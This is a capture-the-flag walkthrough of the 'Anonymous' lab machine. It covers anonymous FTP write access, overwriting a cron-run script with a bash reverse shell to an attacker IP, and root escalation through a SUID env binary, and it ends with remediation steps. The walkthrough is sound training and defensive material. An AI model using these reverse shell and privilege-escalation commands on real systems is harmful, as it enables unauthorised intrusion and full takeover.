Target IP: anonymous.thm (Requires /etc/hosts entry) Difficulty: Medium (Conceptually) / Easy (Technically) Objective: User (user.txt) & Root (root.txt) Flags

1. Executive Summary

The “Anonymous” machine demonstrates the dangers of misconfigured file permissions and scheduled tasks. We gain initial access by exploiting an Anonymous FTP service that allows writing to a directory used by a system Cron Job. By replacing a maintenance script with a reverse shell payload, we gain execution as the user namelessone. Privilege escalation is trivial due to a misconfigured SUID binary (/usr/bin/env), allowing us to spawn a root shell immediately.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Nmap port/script scanning.
  • T1078 (Valid Accounts): Anonymous FTP Access.
  • T1053 (Scheduled Task/Job): Exploiting a Cron Job for execution.
  • T1548 (Abuse Elevation Control Mechanism): SUID exploitation of env.

2. Operational Setup

OpSec Note: “No tricks, just reality.” In a real engagement, you log everything.

Host Configuration

# Verify connection and map IP
ping -c 1 10.10.x.x
echo "10.10.x.x anonymous.thm" | sudo tee -a /etc/hosts

Workspace (Tmux)

  • Pane 1 (Scanner): Nmap/SMBclient.
  • Pane 2 (Listener): nc -lvnp 4444.
  • Pane 3 (FTP): For file transfer and interaction.

3. Enumeration: “What do we see?”

A. Network Scanning

We start with Nmap. The output you provided is rich with information.

nmap -sC -sV -oA nmap/anonymous anonymous.thm

Analysis of Nmap Output:

  • 21/tcp (FTP): vsftpd 2.0.8.

  • CRITICAL: ftp-anon: Anonymous FTP login allowed.

  • CRITICAL: [NSE: writeable] ... scripts.

  • Observation: Write access on an FTP server is a massive red flag.

  • 22/tcp (SSH): Standard Ubuntu SSH.

  • 139/445 (SMB): Samba is running. smb-security-mode shows authentication_level: user, but guest access might be possible.

B. SMB Enumeration

Let’s check the SMB shares first to clear the low-hanging fruit.

smbclient -L //anonymous.thm/
# Enter blank password

Findings:

  • Share: pics (Read Only).
  • Content: corgo.jpg, puppy.jpg.

Rabbit Hole Check: In a real engagement, we download these.

smbclient //anonymous.thm/pics
mget *.jpg
  • Steganography? Running steghide, binwalk, or strings on these images reveals nothing of value. This is likely a rabbit hole to distract us from the FTP service.

C. FTP Enumeration (The Vector)

Now, let’s look at that writable FTP directory.

ftp anonymous.thm
# User: anonymous, Pass: anonymous
cd scripts
ls -la

We see three files:

  1. clean.sh
  2. removed_files.log
  3. to_do.txt

The Hypothesis: We download clean.sh and inspect it.

cat clean.sh
  • Content: It looks like a script that cleans up the /tmp directory.
  • Logic Check: If we see a script and a log file (removed_files.log) that seems to be updating, this implies a Cron Job (Scheduled Task) is running this script periodically.
  • The Attack: Since Nmap told us we have Write Access, we don’t need to find an exploit for vsftpd. We just replace the logic inside clean.sh with our own.

4. Initial Access: The Cron Job

We need to inject a reverse shell into clean.sh and upload it back to the server.

1. Create the Payload

On our attack machine, create a local file named clean.sh.

#!/bin/bash
bash -i >& /dev/tcp/10.10.YOUR.IP/4444 0>&1

2. Upload and Overwrite

Back in the FTP session:

put clean.sh
# Success! The file is overwritten.

3. Execution (The Waiting Game)

Start your listener and wait. Cron jobs usually run every minute in CTFs.

nc -lvnp 4444

…Wait 1-2 minutes…

Success: We catch a shell as namelessone.


5. Privilege Escalation: SUID

Enumeration

We are logged in. Now, “How do we own the box?” First, upgrade the shell (standard procedure).

python3 -c 'import pty; pty.spawn("/bin/bash")'

Now, check for SUID binaries. These are files that execute with the permissions of the file owner (usually root).

find / -perm -u=s -type f 2>/dev/null

Output:

/usr/bin/passwd
/usr/bin/env    <-- ABNORMAL
/usr/bin/gpasswd
...

Analysis: env

The env command is used to run a program in a modified environment. It should never have the SUID bit set. If it does, we can use it to spawn a shell, and that shell will inherit the SUID permissions (Root).

This is a classic GTFOBins vector.

Exploitation

/usr/bin/env /bin/sh -p
  • /usr/bin/env: Runs the command.
  • /bin/sh: The shell we want.
  • -p: Crucial. This tells sh not to drop privileges. Without -p, Bash/Sh might drop the SUID privilege for security reasons.

Result:

# whoami
root

6. Remediation (Blue Team)

How do we fix this?

  1. FTP Configuration:
  • Disable Anonymous Uploads: In /etc/vsftpd.conf, set anon_upload_enable=NO and write_enable=NO for anonymous users.
  • Operational hygiene: Critical maintenance scripts should never be writable by the ftp user or world-writable.
  1. SUID Auditing:
  • Remove the SUID bit from env. It serves no administrative purpose.
  • Command: chmod u-s /usr/bin/env.
  1. SMB Shares:
  • Disable Guest access to shares unless publicly intended.